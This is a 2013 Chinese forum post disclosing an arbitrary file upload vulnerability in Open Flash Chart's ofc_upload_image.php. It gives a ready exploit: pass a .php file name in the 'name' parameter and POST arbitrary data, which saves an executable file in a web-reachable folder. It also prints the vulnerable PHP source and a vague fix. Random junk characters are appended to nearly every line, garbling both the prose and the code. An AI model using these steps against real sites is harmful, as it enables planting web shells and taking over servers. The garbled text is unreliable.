POST 数据漏洞文件执行任意后缀文件保存; o- T, G$ V! H& n; l& e5 D
漏洞文件/chart/php-ofc-library/ofc_upload_image.php- P+ `7 J, ]4 w" f! T _( {* U
" a; _' o* U4 M5 k3 w" Y( s, S
利用:
2 P9 h" W* ?; y% ~! E9 f0 E1 u/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名' ]1 G& w* a4 S
# s1 P" }; M9 ?2 u: s, O5 l4 H
Post任意数据/ M& u6 h8 ?/ k- m! k
保存位置http://localhost/chart/tmp-upload-images/hfy.php' h: w& C% F+ }% y& F0 n' f; w
7 V: X! a% q! N' x
+ r, {7 ], j4 b) r最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~. p8 W* _5 p/ d& W
; v9 i& R: q/ l3 B3 x' i/ B
<?php, O/ F6 i- Q- U. @ P
7 I/ q$ e( R9 ~* N5 k- `//
2 e$ s1 m1 V5 E) Z6 x6 C// In Open Flash Chart -> save_image debug mode, you% j" T0 u! E a: B" W% ]3 I
// will see the 'echo' text in a new window.
' L- l* ~. Y5 i% W2 x- q6 I//
9 q; ?( Z, z1 t* J' c, ^
2 l" M. S: z% m3 H! i/*
" s5 x7 {9 G8 y# E, @) _5 T6 C) P% e9 J/ O4 S
print_r( $_GET );
5 V+ a4 K7 _6 R; R+ g' b/ bprint_r( $_POST );( a0 F' L7 z. |
print_r( $_FILES );
. o1 E. e H l/ a* ]0 R4 a3 m0 n, K+ V' @% i G3 w9 K7 l
print_r( $GLOBALS );
; s6 i S, k' b- i" I% qprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );4 ]" J" ], ^9 U5 N
# |8 ^$ o' r& T2 ^* c w9 b6 d*/
: |+ U: b0 F" d// default path for the image to be stored //) p0 t i9 B4 H( f8 A
$default_path = '../tmp-upload-images/';
& f+ D6 B7 H3 B; v# _. ?. z" z! |! S
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
3 W8 ~: `0 ?, ]& C0 e5 a/ ?
1 L, d& n+ ~; t& L$ Q& O; E// full path to the saved image including filename //
6 t' k% y, `; v$destination = $default_path . basename( $_GET[ 'name' ] );
# H4 W1 T0 Q* T
, b0 I5 W {8 W5 Jecho 'Saving your image to: '. $destination;. q ]) X K/ m1 S* p* e/ M
// print_r( $_POST );
) J/ X* F3 b, [6 v) y( E// print_r( $_SERVER );
& S7 d% g, W2 P. M// echo $HTTP_RAW_POST_DATA;
& ]2 w- _, z0 i
+ i: E' R$ M/ D2 S3 I//
8 @1 G& e. [1 J5 _// POST data is usually string data, but we are passing a RAW .png
, e Z1 Q2 f5 f+ [" g" c# G2 a// so PHP is a bit confused and $_POST is empty. But it has saved
4 `7 c* \1 E: i) M$ i& S// the raw bits into $HTTP_RAW_POST_DATA
* f% ? p: z# r& S//- J/ e, T* K" \/ R, |8 k2 V6 S, W
' d5 @2 |7 g' W5 Y2 k
$jfh = fopen($destination, 'w') or die("can't open file");1 q8 ^9 x n# u6 O1 H
fwrite($jfh, $HTTP_RAW_POST_DATA);
T# D! i* K/ T2 \9 kfclose($jfh);3 a1 d* N( k7 D
t, ?& j. B- m
//
q: ?9 A! y8 u! T7 W' Z// LOOK:
2 x3 a1 ]# u/ ]$ N//
7 w; N! |* ?5 o/ ~+ c' s, Q6 z7 qexit();
8 z0 @& o) f: P& N6 \//
" g! D5 t7 t; u1 q' i* S1 D! g' a: W2 b% Y6 d// PHP5:
* }4 M# z- F M; V; X0 b2 x//' l9 f- }, t' @
( I+ L1 c$ R8 w/ k9 f4 _9 ^
+ _2 n" B: C: ~// default path for the image to be stored //. U! L0 M9 w! v: o; u
$default_path = 'tmp-upload-images/';
! T$ n4 l! ]9 i! \. H; d( N* _/ m! m) W' x) V
if (!file_exists($default_path)) mkdir($default_path, 0777, true);. W- H. |8 j n0 I
3 N" D. A) x7 s! A) e% P) E+ j
// full path to the saved image including filename //
6 ~9 o8 L0 e1 @- N( z8 {$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
. g* {0 Y3 d) i8 ^/ r0 t2 x D6 D5 E+ ?2 d- ]) j! m( d
// move the image into the specified directory //
- f* [5 O+ |0 L1 yif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
( c" c5 _( `. b+ Z0 N# F echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";4 K$ b2 _4 K2 B
} else {* l# O! O/ C/ s* ?, R* c# J6 ]
echo "FILE UPLOAD FAILED";3 D6 h$ `# n2 T0 v7 U* U
}
# a4 ^" R- t! P; e( c! l* m* `! u! `; w
0 c5 Z/ S3 j3 l: f. q$ Y?>3 F0 I; y, F. j3 U+ m
4 }8 j8 H% T2 v+ N( y! m+ Z
4 Y# `1 a8 p/ k
1 `, k% a% t2 y! m+ j1 T# i
5 T$ H/ q: }8 q$ i& J0 T' R4 \+ Y w
X2 y. s, ~$ o, ^6 v; d修复方案:
- E! t' `9 S A8 K2 n8 O3 G5 g这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
0 o7 F4 O: i; m6 Y9 O' P5 `4 m' `( s! c; n' |* g
* [( K$ r5 Q4 l# A: t; i- ?
, ~ {3 E5 \( q; ^9 }2 b, v/ X% ]/ ^$ b
|
发表于 2013-2-23 12:38:58
收藏
支持
反对